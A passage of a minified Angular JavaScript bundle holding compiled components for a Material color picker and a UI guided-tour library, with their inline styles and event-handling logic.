.color-canvas-row:first-of-type .card{height:180px}.ngx-mat-color-canvas .color-canvas-row canvas:hover{cursor:crosshair}.ngx-mat-color-canvas .color-canvas-row .zone{display:flex}.ngx-mat-color-canvas .color-canvas-row .zone-canvas{height:200px}.ngx-mat-color-canvas .color-canvas-row .zone-canvas .zone-block{border:1px solid rgba(0,0,0,.12)}.ngx-mat-color-canvas .color-canvas-row .zone-strip{flex-basis:auto;margin-left:10px}.ngx-mat-color-canvas .color-canvas-row .zone-inputs{display:flex;width:40px;height:200px;flex-direction:column;margin-left:16px;margin-top:12px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2){display:flex}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .preview{min-width:40px;min-height:40px;height:40px;width:40px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field{margin-left:16px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:first-of-type{width:170px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:first-of-type .symbol{font-weight:bold;color:#0000008a}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:last-of-type{width:40px}.ngx-mat-color-canvas .mat-form-field-label{font-weight:bold}\n"],encapsulation:2}),t})(),ixe=(()=>{class t{constructor(){this.colorChanged=new Tt,this.colors1=Sq.slice(0,8),this.colors2=Sq.slice(8,16)}set color(e){e&&(this.selectedColor=e.toHexString())}ngOnInit(){}select(e){this.selectedColor=e;const{r:i,g:n,b:r,a:c}=e5(e);this.colorChanged.emit(new Pp(i,n,r,c))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-collection"]],hostAttrs:[1,"ngx-mat-color-collection"],inputs:{color:"color"},outputs:{colorChanged:"colorChanged"},decls:4,vars:2,consts:[[1,"color-collection-row"],["mat-mini-fab","","class","btn-color",3,"background-color","ngClass","click",4,"ngFor","ngForOf"],["mat-mini-fab","",1,"btn-color",3,"ngClass","click"]],template:function(e,i){1&e&&(m(0,"div",0),ne(1,U6e,1,5,"button",1),u(),m(2,"div",0),ne(3,q6e,1,5,"button",1),u()),2&e&&(C(1),V("ngForOf",i.colors1),C(2),V("ngForOf",i.colors2))},dependencies:[ag,Zi,da],styles:[".ngx-mat-color-collection .btn-color{height:20px;width:20px;margin-right:11px;box-shadow:none;opacity:.3}.ngx-mat-color-collection .btn-color.active{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f;opacity:1}\n"],encapsulation:2}),t})(),Lq=(()=>{class t{constructor(){this.colorChanged=new Tt}ngOnInit(){}handleColorChanged(e){this.colorChanged.emit(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-palette"]],hostAttrs:[1,"ngx-mat-color-palette"],inputs:{color:"color"},outputs:{colorChanged:"colorChanged"},decls:2,vars:2,consts:[[3,"color","colorChanged"]],template:function(e,i){1&e&&(m(0,"ngx-mat-color-canvas",0),he("colorChanged",function(r){return i.handleColorChanged(r)}),u(),m(1,"ngx-mat-color-collection",0),he("colorChanged",function(r){return i.handleColorChanged(r)}),u()),2&e&&(V("color",i.color),C(1),V("color",i.color))},dependencies:[txe,ixe],styles:[".ngx-mat-color-palette .actions{margin-top:10px;display:flex}.ngx-mat-color-palette .actions .left{display:flex;flex-direction:column;margin-right:15px}.ngx-mat-color-palette .actions .left .preview{flex:2 1 auto;margin-bottom:10px}.ngx-mat-color-palette .actions .right{display:flex;width:40px;flex-direction:column}\n"],encapsulation:2}),t})(),t5=(()=>{class t{constructor(){}sameColor(e,i){return null==e&&null==i||null!=e&&null!=i&&e.rgba===i.rgba}format(e,i){return e.toString(i)}parse(e){const i=e5(e);return i?new Pp(i.r,i.g,i.b,i.a):null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const axe={display:{colorInput:"hex"}},zq=new ni("mat-color-formats"),Wq=new ni("ngx-mat-colorpicker-scroll-strategy"),oxe={provide:Wq,deps:[vs],useFactory:function nxe(t){return()=>t.scrollStrategies.reposition()}},rxe=kd(class{constructor(t){this._elementRef=t}});let Fq=(()=>{class t extends rxe{constructor(e){super(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-picker-content"]],viewQuery:function(e,i){if(1&e&&Mi(Lq,5),2&e){let n;Vt(n=Bt())&&(i._palette=n.first)}},hostAttrs:[1,"ngx-mat-colorpicker-content"],hostVars:3,hostBindings:function(e,i){2&e&&(s1("@transformPanel","enter"),Ct("ngx-mat-colorpicker-content-touch",i.picker.touchUi))},inputs:{color:"color"},exportAs:["ngxMatColorPickerContent"],features:[ci],decls:1,vars:1,consts:[[3,"color","colorChanged"]],template:function(e,i){1&e&&(m(0,"ngx-mat-color-palette",0),he("colorChanged",function(r){return i.picker.select(r)}),u()),2&e&&V("color",i.picker._selected)},dependencies:[Lq],styles:[".ngx-mat-colorpicker-content{display:block;border-radius:4px;box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#fff;color:#000000de;padding:16px}.ngx-mat-colorpicker-content .ngx-mat-color-palette{width:296px;height:354px}.ngx-mat-colorpicker-content-touch{display:block;max-height:80vh;overflow:auto}.ngx-mat-colorpicker-content-touch .ngx-mat-color-palette{min-width:250px;min-height:312px;max-width:750px;max-height:788px}@media all and (orientation: landscape){.mat-colorpicker-content-touch .ngx-mat-color-palette{width:64vh;height:80vh}}@media all and (orientation: portrait){.mat-colorpicker-content-touch .ngx-mat-color-palette{width:80vw;height:100vw}}\n"],encapsulation:2,data:{animation:[NV.transformPanel,NV.fadeInCalendar]},changeDetection:0}),t})(),sxe=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this._dialog=e,this._overlay=i,this._zone=n,this._adapter=r,this._dir=c,this._document=T,this._viewContainerRef=k,this.openedStream=new Tt,this.closedStream=new Tt,this._touchUi=!1,this._opened=!1,this._defaultColor="primary",this._validSelected=null,this._disabledChange=new J,this._focusedElementBeforeOpen=null,this._inputSubscription=I.EMPTY,this._selectedChanged=new J,this._scrollStrategy=d}get disabled(){return void 0===this._disabled&&this._pickerInput?this._pickerInput.disabled:!!this._disabled}set disabled(e){const i=wi(e);i!==this._disabled&&(this._disabled=i,this._disabledChange.next(i))}get touchUi(){return this._touchUi}set touchUi(e){this._touchUi=wi(e)}get opened(){return this._opened}set opened(e){e?this.open():this.close()}get defaultColor(){return this._defaultColor}set defaultColor(e){this._defaultColor=e}get color(){return this._color||(this._pickerInput?this._pickerInput.getThemePalette():void 0)}set color(e){this._color=e}get _selected(){return this._validSelected}set _selected(e){this._validSelected=e}ngOnInit(){}ngOnDestroy(){this.close(),this._inputSubscription.unsubscribe(),this._disabledChange.complete(),this._popupRef&&(this._popupRef.dispose(),this._popupComponentRef=null)}select(e){let i=this._selected;this._selected=e,this._adapter.sameColor(i,this._selected)||this._selectedChanged.next(e)}registerInput(e){if(this._pickerInput)throw Error("A ColorPicker can only be associated with a single input.");this._pickerInput=e,this._inputSubscription=this._pickerInput._valueChange.subscribe(i=>this._selected=i)}open(){if(!this._opened&&!this.disabled){if(!this._pickerInput)throw Error("Attempted to open an ColorPicker with no associated input.");this._document&&(this._focusedElementBeforeOpen=this._document.activeElement),this.touchUi?this._openAsDialog():this._openAsPopup(),this._opened=!0,this.openedStream.emit()}}_openAsDialog(){this._dialogRef&&this._dialogRef.close(),this._dialogRef=this._dialog.open(Fq,{direction:this._dir?this._dir.value:"ltr",viewContainerRef:this._viewContainerRef,panelClass:"ngx-mat-colorpicker-dialog"}),this._dialogRef.afterClosed().subscribe(()=>this.close()),this._dialogRef.componentInstance.picker=this,this._setColor()}_openAsPopup(){this._portal||(this._portal=new fp(Fq,this._viewContainerRef)),this._popupRef||this._createPopup(),this._popupRef.hasAttached()||(this._popupComponentRef=this._popupRef.attach(this._portal),this._popupComponentRef.instance.picker=this,this._setColor(),this._zone.onStable.asObservable().pipe(Cn(1)).subscribe(()=>{this._popupRef.updatePosition()}))}_createPopup(){const e=new bg({positionStrategy:this._createPopupPositionStrategy(),hasBackdrop:!0,backdropClass:"mat-overlay-transparent-backdrop",direction:this._dir,scrollStrategy:this._scrollStrategy(),panelClass:"mat-colorpicker-popup"});this._popupRef=this._overlay.create(e),this._popupRef.overlayElement.setAttribute("role","dialog"),ra(this._popupRef.backdropClick(),this._popupRef.detachments(),this._popupRef.keydownEvents().pipe(Dn(i=>27===i.keyCode||this._pickerInput&&i.altKey&&38===i.keyCode))).subscribe(i=>{i&&i.preventDefault(),this.close()})}close(){if(!this._opened)return;this._popupRef&&this._popupRef.hasAttached()&&this._popupRef.detach(),this._dialogRef&&(this._dialogRef.close(),this._dialogRef=null),this._portal&&this._portal.isAttached&&this._portal.detach();const e=()=>{this._opened&&(this._opened=!1,this.closedStream.emit(),this._focusedElementBeforeOpen=null)};this._focusedElementBeforeOpen&&"function"==typeof this._focusedElementBeforeOpen.focus?(this._focusedElementBeforeOpen.focus(),setTimeout(e)):e()}_setColor(){const e=this.color;this._popupComponentRef&&(this._popupComponentRef.instance.color=e),this._dialogRef&&(this._dialogRef.componentInstance.color=e)}_createPopupPositionStrategy(){return this._overlay.position().flexibleConnectedTo(this._pickerInput.getConnectedOverlayOrigin()).withTransformOriginOn(".ngx-mat-colorpicker-content").withFlexibleDimensions(!1).withViewportMargin(8).withLockedPosition().withPositions([{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom"}])}}return t.\u0275fac=function(e){return new(e||t)(Ee(vu),Ee(vs),Ee(qi),Ee(t5),Ee(Cr,8),Ee(Wq),Ee(ga,8),Ee(fo))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-picker"]],inputs:{disabled:"disabled",touchUi:"touchUi",opened:"opened",defaultColor:"defaultColor",color:"color"},outputs:{openedStream:"opened",closedStream:"closed"},exportAs:["ngxMatColorPicker"],decls:0,vars:0,template:function(e,i){},encapsulation:2,changeDetection:0}),t})();class lT{constructor(a,e){this.target=a,this.targetElement=e,this.value=this.target.value}}const cxe={provide:Ls,useExisting:ja(()=>a5),multi:!0},lxe={provide:Cs,useExisting:ja(()=>a5),multi:!0};let a5=(()=>{class t{constructor(e,i,n,r){if(this._elementRef=e,this._formField=i,this._colorFormats=n,this._adapter=r,this.colorChange=new Tt,this.colorInput=new Tt,this._disabledChange=new Tt,this._valueChange=new Tt,this._onTouched=()=>{},this._cvaOnChange=()=>{},this._validatorOnChange=()=>{},this._pickerSubscription=I.EMPTY,this._validator=Ad.compose([]),this._lastValueValid=!1,!this._colorFormats)throw function Y6e(t){return Error(`NgxMatColorPicker: No provider found for ${t}. You must define MAT_COLOR_FORMATS in your module`)}("MAT_COLOR_FORMATS")}set ngxMatColorPicker(e){!e||(this._picker=e,this._picker.registerInput(this),this._pickerSubscription.unsubscribe(),this._pickerSubscription=this._picker._selectedChanged.subscribe(i=>{this.value=i,this._cvaOnChange(i),this._onTouched(),this.colorInput.emit(new lT(this,this._elementRef.nativeElement)),this.colorChange.emit(new lT(this,this._elementRef.nativeElement))}))}get disabled(){return!!this._disabled}set disabled(e){const i=wi(e),n=this._elementRef.nativeElement;this._disabled!==i&&(this._disabled=i,this._disabledChange.emit(i)),i&&n.blur&&n.blur()}get value(){return this._value}set value(e){const i=this.value;this._value=e,this._formatValue(e),this._adapter.sameColor(i,e)||this._valueChange.emit(e)}getThemePalette(){return this._formField?this._formField.color:void 0}registerOnValidatorChange(e){this._validatorOnChange=e}validate(e){return this._validator?this._validator(e):null}getPopupConnectionElementRef(){return this.getConnectedOverlayOrigin()}getConnectedOverlayOrigin(){return this._formField?this._formField.getConnectedOverlayOrigin():this._elementRef}ngOnInit(){}ngOnDestroy(){this._pickerSubscription.unsubscribe(),this._valueChange.complete(),this._disabledChange.complete()}writeValue(e){this.value=e}registerOnChange(e){this._cvaOnChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_onChange(){this.colorChange.emit(new lT(this,this._elementRef.nativeElement))}_onKeydown(e){this._picker&&e.altKey&&40===e.keyCode&&!this._elementRef.nativeElement.readOnly&&(this._picker.open(),e.preventDefault())}_onBlur(){this.value&&this._formatValue(this.value),this._onTouched()}_formatValue(e){this._elementRef.nativeElement.value=e?this._adapter.format(e,this._colorFormats.display.colorInput):""}_onInput(e){const i=this._lastValueValid,n=this._adapter.parse(e);this._adapter.sameColor(n,this._value)?i!==this._lastValueValid&&this._validatorOnChange():(this._value=n,this._cvaOnChange(n),this._valueChange.emit(n),this.colorInput.emit(new lT(this,this._elementRef.nativeElement)))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(nn,8),Ee(zq,8),Ee(t5))},t.\u0275dir=Ot({type:t,selectors:[["input","ngxMatColorPicker",""]],hostVars:3,hostBindings:function(e,i){1&e&&he("input",function(r){return i._onInput(r.target.value)})("change",function(){return i._onChange()})("blur",function(){return i._onBlur()})("keydown",function(r){return i._onKeydown(r)}),2&e&&(Gs("disabled",i.disabled),Rt("aria-haspopup",i._picker?"dialog":null)("aria-owns",(null==i._picker?null:i._picker.opened)&&i._picker.id||null))},inputs:{ngxMatColorPicker:"ngxMatColorPicker",disabled:"disabled",value:"value"},outputs:{colorChange:"colorChange",colorInput:"colorInput"},exportAs:["ngxMatColorPickerInput"],features:[ki([cxe,lxe,{provide:c8,useExisting:t}])]}),t})(),Vq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[t5,oxe],imports:[rn,l8,hp,aA,_8,z4,ux,y8,yu,ib]}),t})();const mxe=["*"];var Op=(()=>{return(t=Op||(Op={}))[t.Top=0]="Top",t[t.Bottom=1]="Bottom",t[t.All=2]="All",Op;var t})();function Bq(t,a=Op.All){const e=window.innerWidth,i=window.innerHeight,n=t.getBoundingClientRect(),r=n.left>=0&&n.right<=e,c=n.top>=0,d=n.bottom<=i;return a===Op.Top?c&&r:a===Op.Bottom?d&&r:c&&d&&r}class Hq{static ensureVisible(a){Bq(a,Op.Bottom)?Bq(a,Op.Top)||a.scrollIntoView(!0):a.scrollIntoView(!1)}}let n5=(()=>{class t{constructor(e){this.renderer=e.createRenderer(null,null)}show(e,i=!0){this.isScrollingEnabled=i,this.targetHtmlElement=e.nativeElement,this.backdropElements||(this.backdropElements=this.createBackdropElements(),this.subscribeToWindowResizeEvent()),this.setBackdropPosition()}setBackdropPosition(){const e=this.targetHtmlElement.getBoundingClientRect(),i=document.documentElement,n=i.scrollHeight,c=window.scrollX,d=window.scrollY,te=[{width:e.left+c,height:n,top:0,left:0},{width:e.width,height:e.top+d,top:0,left:e.left+c},{width:e.width,height:n-(e.bottom+d),top:e.bottom+d,left:e.left+c},{width:i.scrollWidth-(e.right+c),height:n,top:0,left:e.right+c}];for(let pe=0;pe<te.length;pe++){const Re=this.createBackdropStyles(te[pe]);this.applyStyles(Re,this.backdropElements[pe])}}subscribeToWindowResizeEvent(){const e=Tc(window,"resize");this.windowResizeSubscription$=e.pipe(function dxe(t){return Ie((a,e)=>{let i=!1,n=null,r=null;const c=()=>{if(null==r||r.unsubscribe(),r=null,i){i=!1;const d=n;n=null,e.next(d)}};a.subscribe(Ae(e,d=>{null==r||r.unsubscribe(),i=!0,n=d,r=Ae(e,c,y),pn(t(d)).subscribe(r)},()=>{c(),e.complete()},void 0,()=>{n=r=null}))})}(()=>$z(10))).subscribe(()=>{this.setBackdropPosition(),Hq.ensureVisible(this.targetHtmlElement)})}close(){this.backdropElements&&(this.removeBackdropElement(),this.windowResizeSubscription$.unsubscribe())}removeBackdropElement(){this.backdropElements.forEach(e=>this.renderer.removeChild(document.body,e)),this.backdropElements=void 0}applyStyles(e,i){for(const n of Object.keys(e))this.renderer.setStyle(i,n,e[n])}createBackdropStyles(e){return{position:this.isScrollingEnabled?"absolute":"fixed",width:`${e.width}px`,height:`${e.height}px`,top:`${e.top}px`,left:`${e.left}px`,backgroundColor:"rgba(0, 0, 0, 0.7)",zIndex:"101"}}createBackdropElement(){const e=this.renderer.createElement("div");return this.renderer.addClass(e,"ngx-ui-tour_backdrop"),this.renderer.appendChild(document.body,e),e}createBackdropElements(){return Array.from({length:4}).map(()=>this.createBackdropElement())}}return t.\u0275fac=function(e){return new(e||t)(At(qs))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();var Yl=(()=>{return(t=Yl||(Yl={}))[t.OFF=0]="OFF",t[t.ON=1]="ON",t[t.PAUSED=2]="PAUSED",Yl;var t})(),Wg=(()=>{return(t=Wg||(Wg={}))[t.Forwards=0]="Forwards",t[t.Backwards=1]="Backwards",Wg;var t})();const uxe={disableScrollToAnchor:!1,prevBtnTitle:"Prev",nextBtnTitle:"Next",endBtnTitle:"End",enableBackdrop:!1,isAsync:!1,isOptional:!1,delayAfterNavigation:0,nextOnAnchorClick:!1};let dT=(()=>{class t{constructor(e,i,n){this.router=e,this.rendererFactory=i,this.backdrop=n,this.stepShow$=new J,this.stepHide$=new J,this.initialize$=new J,this.start$=new J,this.end$=new J,this.pause$=new J,this.resume$=new J,this.anchorRegister$=new J,this.anchorUnregister$=new J,this.events$=ra(this.stepShow$.pipe(Xe(r=>({name:"stepShow",value:r}))),this.stepHide$.pipe(Xe(r=>({name:"stepHide",value:r}))),this.initialize$.pipe(Xe(r=>({name:"initialize",value:r}))),this.start$.pipe(Xe(r=>({name:"start",value:r}))),this.end$.pipe(Xe(r=>({name:"end",value:r}))),this.pause$.pipe(Xe(r=>({name:"pause",value:r}))),this.resume$.pipe(Xe(r=>({name:"resume",value:r}))),this.anchorRegister$.pipe(Xe(r=>({name:"anchorRegister",value:r}))),this.anchorUnregister$.pipe(Xe(r=>({name:"anchorUnregister",value:r})))),this.steps=[],this.anchors={},this.status=Yl.OFF,this.isHotKeysEnabled=!0,this.direction=Wg.Forwards,this.renderer=i.createRenderer(null,null)}initialize(e,i){e&&e.length>0&&(this.status=Yl.OFF,this.steps=e.map(n=>Object.assign(Object.assign(Object.assign({},uxe),i),n)),this.initialize$.next(this.steps))}disableHotkeys(){this.isHotKeysEnabled=!1}enableHotkeys(){this.isHotKeysEnabled=!0}start(){this.startAt(0)}startAt(e){this.status=Yl.ON,this.goToStep(this.loadStep(e)),this.start$.next(),this.router.events.pipe(Dn(i=>i instanceof Ey),Dd()).subscribe(()=>{this.currentStep&&this.currentStep.hasOwnProperty("route")&&this.hideStep(this.currentStep)})}end(){this.status=Yl.OFF,this.hideStep(this.currentStep),this.currentStep=void 0,this.removeLastAnchorClickListener(),this.backdrop.close(),this.end$.next()}pause(){this.status=Yl.PAUSED,this.hideStep(this.currentStep),this.pause$.next()}resume(){this.status=Yl.ON,this.showStep(this.currentStep),this.resume$.next()}toggle(e){e?this.currentStep?this.pause():this.resume():this.currentStep?this.end():this.start()}next(){this.direction=Wg.Forwards,this.hasNext(this.currentStep)&&this.goToStep(this.loadStep(this.currentStep.nextStep||this.steps.indexOf(this.currentStep)+1))}hasNext(e){return e?void 0!==e.nextStep||this.steps.indexOf(e)<this.steps.length-1&&!this.isNextOptionalAnchorMissing(e):(console.warn("Can't get next step. No currentStep."),!1)}isNextOptionalAnchorMissing(e){for(let n=this.steps.indexOf(e)+1;n<this.steps.length;n++){const r=this.steps[n];if(!r.isOptional||this.anchors[r.anchorId])return!1}return!0}prev(){this.direction=Wg.Backwards,this.hasPrev(this.currentStep)&&this.goToStep(this.loadStep(this.currentStep.prevStep||this.steps.indexOf(this.currentStep)-1))}hasPrev(e){return e?void 0!==e.prevStep||this.steps.indexOf(e)>0&&!this.isPrevOptionalAnchorMising(e):(console.warn("Can't get previous step. No currentStep."),!1)}isPrevOptionalAnchorMising(e){for(let n=this.steps.indexOf(e)-1;n>-1;n--){const r=this.steps[n];if(!r.isOptional||this.anchors[r.anchorId])return!1}return!0}goto(e){this.goToStep(this.loadStep(e))}register(e,i){if(e){if(this.anchors[e])throw new Error("anchorId "+e+" already registered!");this.anchors[e]=i,this.anchorRegister$.next(e)}}unregister(e){!e||(delete this.anchors[e],this.anchorUnregister$.next(e))}getStatus(){return this.status}isHotkeysEnabled(){return this.isHotKeysEnabled}goToStep(e){if(!e)return console.warn("Can't go to non-existent step"),void this.end();this.currentStep&&this.hideStep(this.currentStep),this.removeLastAnchorClickListener(),null!=e.route?this.navigateToRouteAndSetStep(e):this.setCurrentStepAsync(e)}removeLastAnchorClickListener(){this.unListenNextOnAnchorClickFn&&(this.unListenNextOnAnchorClickFn(),this.unListenNextOnAnchorClickFn=void 0)}listenToOnAnchorClick(e){e.nextOnAnchorClick&&(this.unListenNextOnAnchorClickFn=this.renderer.listen(this.anchors[e.anchorId].element.nativeElement,"click",()=>this.next()))}navigateToRouteAndSetStep(e){return ht(this,void 0,void 0,function*(){const i="string"==typeof e.route?e.route:this.router.createUrlTree(e.route);this.router.isActive(i,{paths:"exact",matrixParams:"exact",queryParams:"subset",fragment:"ignored"})?this.setCurrentStepAsync(e):(yield this.router.navigateByUrl(i))?this.setCurrentStepAsync(e,e.delayAfterNavigation):(console.warn("Navigation to route failed: ",e.route),this.end())})}loadStep(e){return"number"==typeof e?this.steps[e]:this.steps.find(i=>i.stepId===e)}setCurrentStep(e){this.currentStep=e,this.showStep(this.currentStep),this.router.events.pipe(Dn(i=>i instanceof Ey),Dd()).subscribe(()=>{this.currentStep&&this.currentStep.hasOwnProperty("route")&&this.hideStep(this.currentStep)})}setCurrentStepAsync(e,i=0){setTimeout(()=>this.setCurrentStep(e),i)}showStep(e){const i=this.anchors[e&&e.anchorId];if(!i)return e.isAsync?void this.anchorRegister$.pipe(Dn(n=>n===e.anchorId),Dd(),Z3(0)).subscribe(()=>this.showStep(e)):e.isOptional?void(this.direction===Wg.Forwards?this.next():this.prev()):(console.warn("Can't attach to unregistered anchor with id "+e.anchorId),void this.end());this.listenToOnAnchorClick(e),this.scrollToAnchor(e),i.showTourStep(e),this.toggleBackdrop(e),this.stepShow$.next(e)}hideStep(e){const i=this.anchors[e&&e.anchorId];!i||(i.hideTourStep(),this.stepHide$.next(e))}scrollToAnchor(e){e.disableScrollToAnchor||Hq.ensureVisible(this.anchors[null==e?void 0:e.anchorId].element.nativeElement)}toggleBackdrop(e){var i,n;const r=this.anchors[null==e?void 0:e.anchorId],c=null===(n=null===(i=r.getIsScrollingEnabled)||void 0===i?void 0:i.call(r))||void 0===n||n;e.enableBackdrop?this.backdrop.show(r.element,c):this.backdrop.close()}}return t.\u0275fac=function(e){return new(e||t)(At(Oo),At(qs),At(n5))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),hxe=(()=>{class t{constructor(e){this.tourService=e}onEscapeKey(){this.tourService.getStatus()===Yl.ON&&this.tourService.isHotkeysEnabled()&&this.tourService.end()}onArrowRightKey(){const e=this.tourService.currentStep;this.tourService.getStatus()===Yl.ON&&this.tourService.hasNext(this.tourService.currentStep)&&this.tourService.isHotkeysEnabled()&&(null==e||!e.nextOnAnchorClick)&&this.tourService.next()}onArrowLeftKey(){this.tourService.getStatus()===Yl.ON&&this.tourService.hasPrev(this.tourService.currentStep)&&this.tourService.isHotkeysEnabled()&&this.tourService.prev()}}return t.\u0275fac=function(e){return new(e||t)(Ee(dT))},t.\u0275cmp=Wt({type:t,selectors:[["tour-hotkey-listener"]],hostBindings:function(e,i){1&e&&he("keydown.Escape",function(){return i.onEscapeKey()},0,zC)("keydown.ArrowRight",function(){return i.onArrowRightKey()},!1,zC)("keydown.ArrowLeft",function(){return i.onArrowLeftKey()},!1,zC)},ngContentSelectors:mxe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2}),t})(),Uq=(()=>{class t{static forRoot(){return{ngModule:t,providers:[dT,n5]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs]}),t})();function fxe(t,a){1&t&&Ir(0)}function pxe(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(){return be(e),Me(B(2).tourService.next())}),s(1),m(2,"mat-icon"),s(3,"chevron_right"),u()()}if(2&t){const e=B().step;C(1),ct(" ",null==e?null:e.nextBtnTitle," ")}}function _xe(t,a){if(1&t){const e=Ye();m(0,"button",12),he("click",function(){return be(e),Me(B(2).tourService.end())}),s(1),u()}if(2&t){const e=B().step;C(1),ct(" ",null==e?null:e.endBtnTitle," ")}}function gxe(t,a){if(1&t){const e=Ye();m(0,"mat-card",3),he("click",function(n){return n.stopPropagation()}),m(1,"mat-card-title")(2,"div",4),s(3),u(),m(4,"button",5),he("click",function(){return be(e),Me(B().tourService.end())}),m(5,"mat-icon"),s(6,"close"),u()()(),it(7,"mat-card-content",6),m(8,"mat-card-actions",7)(9,"button",8),he("click",function(){return be(e),Me(B().tourService.prev())}),m(10,"mat-icon"),s(11,"chevron_left"),u(),s(12),u(),ne(13,pxe,4,1,"button",9),ne(14,_xe,2,1,"button",10),u()()}if(2&t){const e=a.step,i=B();C(3),ke(null==e?null:e.title),C(4),V("innerHTML",null==e?null:e.content,Hc),C(2),V("disabled",!i.tourService.hasPrev(e)),C(3),ct(" ",null==e?null:e.prevBtnTitle," "),C(1),V("ngIf",i.tourService.hasNext(e)&&!e.nextOnAnchorClick),C(1),V("ngIf",!i.tourService.hasNext(e))}}const Cxe=function(t){return{step:t}};let Gb=(()=>{class t extends dT{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function yxe(t,a){return()=>{const i=t.scrollStrategies;return a.currentStep.disablePageScrolling?i.block():i.reposition()}}let bxe=(()=>{class t{constructor(e){this.changeDetector=e}markForCheck(){this.changeDetector.markForCheck()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["tour-anchor-opener"]],viewQuery:function(e,i){if(1&e&&Mi(po,7),2&e){let n;Vt(n=Bt())&&(i.trigger=n.first)}},features:[ki([{provide:n8,useFactory:yxe,deps:[vs,Gb]}])],decls:1,vars:1,consts:[["matMenuTriggerFor","",3,"matMenuTriggerRestoreFocus"]],template:function(e,i){1&e&&it(0,"span",0),2&e&&V("matMenuTriggerRestoreFocus",!1)},dependencies:[po],styles:["[_nghost-%COMP%]{display:none}"]}),t})(),o5=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),qq=(()=>{class t{constructor(e,i,n,r,c){this.injector=e,this.viewContainer=i,this.element=n,this.tourService=r,this.tourStepTemplate=c}ngOnInit(){this.tourService.register(this.tourAnchor,this)}ngOnDestroy(){this.tourService.unregister(this.tourAnchor)}createOpener(){this.opener=this.viewContainer.createComponent(bxe).instance}showTourStep(e){var i,n;this.isActive=!0,this.tourStepTemplate.templateComponent.step=e,this.opener||this.createOpener();const r=this.opener.trigger;r._element=this.element;const c=this.tourStepTemplate.templateComponent.tourStep;r.menu=c,c.xPosition=(null===(i=e.placement)||void 0===i?void 0:i.xPosition)||"after",c.yPosition=(null===(n=e.placement)||void 0===n?void 0:n.yPosition)||"below",c.hasBackdrop=!!e.closeOnOutsideClick,this.opener.markForCheck(),r.openMenu(),this.menuCloseSubscription&&this.menuCloseSubscription.unsubscribe(),this.menuCloseSubscription=r.menuClosed.pipe(Dd()).subscribe(()=>{this.tourService.getStatus()!==Yl.OFF&&this.tourService.end()})}hideTourStep(){this.isActive=!1,this.menuCloseSubscription&&this.menuCloseSubscription.unsubscribe(),this.opener.trigger.closeMenu()}getIsScrollingEnabled(){return!this.tourService.currentStep.disablePageScrolling}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ko),Ee(fo),Ee(mi),Ee(Gb),Ee(o5))},t.\u0275dir=Ot({type:t,selectors:[["","tourAnchor",""]],hostVars:2,hostBindings:function(e,i){2&e&&Ct("touranchor--is-active",i.isActive)},inputs:{tourAnchor:"tourAnchor"}}),t})(),Mxe=(()=>{class t extends hxe{constructor(e,i){super(i),this.tourStepTemplateService=e,this.tourService=i,this.step={}}ngAfterViewInit(){this.tourStepTemplateService.templateComponent=this}}return t.\u0275fac=function(e){return new(e||t)(Ee(o5),Ee(Gb))},t.\u0275cmp=Wt({type:t,selectors:[["tour-step-template"]],contentQueries:function(e,i,n){if(1&e&&ha(n,ho,5),2&e){let r;Vt(r=Bt())&&(i.stepTemplateContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(Xo,5),2&e){let n;Vt(n=Bt())&&(i.tourStep=n.first)}},inputs:{stepTemplate:"stepTemplate"},features:[ci],decls:4,vars:5,consts:[[1,"tour-step",3,"overlapTrigger"],[4,"ngTemplateOutlet","ngTemplateOutletContext"],["defaultTemplate",""],[3,"click"],[1,"title-text"],["mat-button","","mat-icon-button","",1,"close",3,"click"],[3,"innerHTML"],["align","end"],["mat-button","",1,"prev",3,"disabled","click"],["mat-button","","class","next",3,"click",4,"ngIf"],["mat-button","",3,"click",4,"ngIf"],["mat-button","",1,"next",3,"click"],["mat-button","",3,"click"]],template:function(e,i){if(1&e&&(m(0,"mat-menu",0),ne(1,fxe,1,0,"ng-container",1),u(),ne(2,gxe,15,6,"ng-template",null,2,d1)),2&e){const 